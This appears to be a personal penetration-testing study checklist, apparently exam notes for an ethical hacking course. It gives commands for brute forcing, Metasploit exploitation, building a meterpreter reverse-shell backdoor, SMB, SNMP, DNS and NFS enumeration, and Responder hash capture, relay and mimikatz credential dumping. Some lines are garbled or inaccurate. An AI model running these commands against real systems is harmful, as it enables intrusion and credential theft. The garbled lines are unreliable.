spicy_pentest_checklist

xam2

20 November 2022 19:48

Hydra tOOL:

Hydra -P <.txt> -L <.txt> ftp://<ip>

Medusa

Medusa -h <ip> -U <.txt> -P <.txt> -M <Service (ftp,ssh)>

Vulnerability Assessments

Nikto -h <ip> Tuning x

System hacking Metasploit

  • Do nmpa service detection

  • Search <service name> # for samba search usermap_script

  • Use <payload name>

  • Show options

  • Set RHOST IP and LHOSt IP

  • Set Payload <path>

  • Exploit

  • Note: payload : cmd/unix/reverse

  • For unrealIRC port 6667 use <search unrealirc>

Backdooring through Metasploit

Msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST <ip> LPORT<N .o> -o /path.exe

Listning:

Msfconsole -q

Use exploit /multi/handler

Ayload windows/meterpreter/reverse_tcp Set LHOST <ip>

Set LPORT <ip> Exploit

Adding Powersploit for VNC connection and Evasion Bypass!

Hacking Windows machine with a Microsoft office Document using FAT RAT:

Gaining highest ROOT Privilege using Beroot

Once you got reverse shell with meterpreter upload beetroot Then by using shell execute beetroot

Covert Channels using covert_TCP

We have to compile the covert_tcp file

Cc -o <output of compiled file.c> <file name>

./covert_tcp.c -dest<ip> -source <ip> -source_port<n.o> -dest_port

<> -server -file <the path you want to save your file>

./covert_tcp.c -dest<ip> -source <ip> -source_port<n.o> -dest_port

<> -file <the path of the file which wanted to be sent >

<>

Steganography:

Snow -C -m "<message>" -p "<password>" <existing txt> <new txt> Snow -C -p "<password>" <new txt>

HOST Discovery

Linux Tools:

Netdiscover

$netdiscover -i <Interface name>

$netdicover -i <subnet> NMAP

$nmap -sn -PR [IP]

-sn: Disable port scan PR:*ARP ping scan

$nmap -sn -PU [IP]

-PU: UDP ping scan

$nmap -sn -PE [IP or IP Range] PE: ICMP ECHO ping scan

$nmap -sn -PP [IP

PP: ICMP timestamp ping scan

$nmap -sn -PM [IP]

PM: ICMP address mask ping scan

$nmap -sn -PS [IP]

PS: TCP SYN Ping scan

Scanning:

NMAP

$Nmap -sn <ip> -vv -oA <outputname.xml>

Ref: https://www.stationx.net/nmap-cheat-sheet/ https://www.stationx.net/nmap-cheat-sheet/

To Convert nmap.xml to html use-

$xsltproc ms2.xml -o ms2.html

PORT 21 Enumeration:

First of all we need to know the version and type -- vsftpd 2.3.4

second - ftp has an common issue - anonymous login username - anonymous

password - anonymous

third - we can do script scan --

choose the relvent nmap script for the enumration

Now if version is not showing any details from basic enumration then try visit - exploit-db.com

and try to search the exploit

if you want localsearch then try with

always skip the DOS scripts

if you dont have access to the machine locally then always choose the remote scripts for the maximum results if they are visible

DOS - ignore

webapps -- check further Remote - for direct usage

local - if you have cetain access of the target then choose the local exploits

PORT 22 Enumeration:

  1. guessing the username and password -->>

  2. brute force username and password ( get the username somehow )

  3. openssl < 1.0 then it has a private key brute force attack option ( legacy attack )

PORT 23 Enumeration:

  2. if any version is discloused here the follow the same steps like ftp exploit search

SMB Enumeration:

versions of smb >??? v1 , v2 ,v3

port 137 , 138 , 139 , 445

  1. anonymous login or guest login

  2. if you have password then mount the share

  3. version speicifc issues

smbv1 - eternalblue smbv2 - llmnr poisoning smbv3 - smbghost

distc kernelmapper Portmapper enum4linux

smbclient smbmap

--script discovery

Sambacry

SMB Enum using NMAP scripts

$Nmap -p 445 --script /usr/share/nmap/scripts/smb-enum-sessions.nse <IP>

$Nmap -p 445 --script /usr/share/nmap/scripts/smb-enum-shares.nse <IP>

$Nmap -p 445 --script /usr/share/nmap/scripts/smb-os-discovery.nse <IP>

$nmap -Pn -n -p139,445 --script discovery 192.168.72.139

You can also specify -p 445 , 139 for ports.

$nmap -p 139 --script smb-double-pulsar-backdoor <IP>

SMB Enum using smbclient and smbmap

$smbclient -L \\192.168.72.139\\

$smbmap -H 192.168.72.139

$smbclient \\\\192.168.72.139\\tmp

SMB ENUM using SMBmap

$smbmap -R tmp -H <ip>

$you can use -U -P -R -r please do check the manual page

SMB ENUM using SMB Client:

$smbclient -L <ip with the path>

Enum4Linux: mostly used for SAMBA ENUM!

*enumerate info from windows and samba hosts using enum4linux

enum4linux -u martin -p apple -n $ip

-n Do an nmblookup (similar to nbtstat)

//information: target info,workgroup/domain,domain SID(SECURITY IDENTIFIER), list of users with RID(RELATive identifier)

enum4linux -u martin -p apple -P $ip

//password policy info

enum4linux -u martin -p apple -S $ip

//share policy info

Good R

Esource consist of everythig discussed so far: https://github.com/irgoncalves/smbclient_cheatsheet

Windows tools:

NETSCAN tools pro --> use smb scanner option

NETBIOS Enumeration:

Tool: https://nbtenum.sourceforge.net/

Nbtstat -a <ip> for windows use only Nbtstat -c <ip> for windows use only Nbtscan <ip-range> for Parrot use only

Microsoft Documentation: https://learn.microsoft.com/en-us/windows-server/administration/windows- commands/nbtstat

You can aslo nmap here

Nmap -sV -v --script nbstat.nse<ip> nmap -sU -p 137 --script nbstat.nse<ip> nmap -sV -v --script nbstat.nse $ip

-sV: Probe open ports to determine service/version info

*NB enum using cmd nbtstat -a $ip

a nb name of remote comp

nbtstat -c $ip

c nb name cache of remote comp

net use

connection status, shared folder, network info

connect or disconnects a computer from shared resource

*nb enum using netbios enumerator

NETBIOS ENUMERATION SUPERSCAN

NETBIOS ENUMERATOR NULL SESSION NETBIOS

NET USE \\IP\FOLDER ""\USER:""

SNMP Enumeration:

Snmp-check <ip> Nmap -sU -p 161 <ip>

**perform smnp enum using snmp-check check if snmp is open

nmap -sU -p 161 $ip

-depicts : 161 is being used by the default public ocmmunity string

snmp-check $ip

//get info about sys info and user accounts,network info , network interfaces,routing info,and listening ports

//process, storage ,file system ,device info,shares ,file system

**perform smnp enum using soft perfect network scanning specify range ,discover devices,rightclick properties and get details

SNMP 161 BRUTE FORCE

NMAP -sU -p 161 --script=snmp-brute IP

METASPLOIT ( AUXILIARY/SCANNER/SNMP/SNMP_LOGIN) ( AUXILIARY/SCANNER/SNMP/SNMP_ENUM)

**Lab2-Task1: Enumerate SNMP using snmp-check**

  • nmap -sU -p 161 [IP]

  • **snmp-check [IP]**

**Addition**

  • nbtstat -a [IP] (Windows)

  • nbtstat -c

DNS Enumeration:

To get name server and mail server details:

$dnsenum <ip>

To get different services running on target domain

$Dnsrecon -t -srv -d <ip> / -t oxfr(this is for zone transfer) To get name servers of target domains

$fierce -dns <ip>

*perform dns enum

//collect dns server name,hostnames,machine names,usernames,ip addrr and aliases in target domain

**perform dns enum using zone transfer open termninal in linux

dig ns www.certifiedhacker.com

reterive info about dns name server pf target domain and displays in answer section

try if zone transfer is possible

dig @ns1.bluehost.com www.certifiedhacker.com axfr axfr reterive zone information

**perform dns enum of windows DNS servers. open cmd in windows

>nslookup

>set qyerytype=soa

soa start of authority record, administrative info about dns zone

>certifiedhacker.com

>ls -d ns1.bluehost.com

ls -d requests zone transfer ns1.bluehost.com primary name server

**perform dns enum usign DNSSEC zone walking

//dns records(MX,SOA,NS,A,AAAA,SPF,TXT) enumerator

dnsrecon -d www.certifiedhacker.com -z

-d domain

-z zone walk using standard enum procedure

LDAP ENUM:

perform LDAP enumeration

..generate list of distributed directory services on target system

..directory services has hierarchical and logical tree about components of network, from list of printers to corporate email directories

.. company org chart

**perform LDAP enumeration using Active Directory Explorer by sysinternals connect using IP and creds

complete AD would be displayed and possible to modify also

Windows tool

;Active Diretory Explorer.

RPC ENUM:

*perform rpc, smb, and ftp enumeration

rpc-> check vulnerable services on these ports

smb-> enable banner grabbing, os detais,service version

ftp-> check ftp services and attack, ftp bounce, ftp brutre and packet sniffing

*perform rpc & smb enumeration using netscan tools pro RPC- netscan tools pro

>MANUAL TOOLS

>nix RPC info

>target ip, target port 111

>dump portmap

>result: reterival of all running registred daemons on target system

SMB- - netscan tools pro

>smb scanner

>add to list ->ok

>login cred, username, password > add to list > ok

>click get smb versions

>result: netbios name,dns name,smb versions,shares

*perform rpc & smb & ftp enumeration using nmap nmap -p 21 $ip

nmap -A $ip

nmap -A -p 445 $ip

NFS ENUM:

*perform NFS Enumeration

NFS - access / view /store /update files on reomote server

After LDAP go for NFS - IDENTIFY EXPORTED DIRECTORIES,list of clients connected to server with their ip addr and shared data associated with them

Possible to spoof ip and get acces to shared resource

**perform NFS Enumeration superenum check if nfs is open

nmap -p 2049 $ip

nfs also runs on other ports echo $ip > target.txt

./superenum

//pass filename -> target.txt 15-20 minutes to complete

**perform NFS Enumeration rpc-scan

git clone https://github.com/hegusung/RPCScan

python3 rpc-scan $ip --rpc

it will show the list if nfs is open

System hacking:

Gem References: https://github.com/SpiderLabs/Responder

https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b

RESPONDER

responder -I tun0 // john responder_file

  1. Download Responder tool

--> git clone https://github.com/lgandx/Responder

  1. Launch Responder

--> python Responder.py -I eth0

--> Check LLMNR / NBT-NS / DNS/MDNS are ON

  1. Search shared file on victim host

--> \\hackme

  1. Attacker host (Responder)

--> Received NTLMv2 Hash of the victim

  1. Crack Hash value to get the password using Hashcat

--> hashcat -m 5600 hashes.txt rockyou.txt -D1

--> hashcat -m 5600 hashes.txt rockyou.txt -D1 --show --user

  1. SMB Relay

--> python Multirelay.py -h

--> python Multirelay.py -t <Target-IP> -u ALL

--> Before running Multirelay script, need to turn OFF (SMB and HTTP) options

--> vim Responder.conf

--> Received hash value of the victim

--> Forward to the targeted file, to get access as the victim

  1. Show password in victim host

--> help

--> mimi coffee

--> mimi sekurlsa::logonpasswords

  1. RunFinger

--> Only work when SMB is disabled.

--> python RunFinger.py -h

--> python RunFinger.py -i 192.168.1.0/24 Reference

--> https://notsosecure.com/pwning-with-responder-a-pentesters-guide/

--> https://www.youtube.com/watch?v=rjRDsXp_MNk&ab_channel=RajganeshPandurangan

--> https://www.youtube.com/watch?v=LHv1ud5lnX0&ab_channel=Joostvan%27tZand

PreviousSpicy_Pentest_checklist

Last updated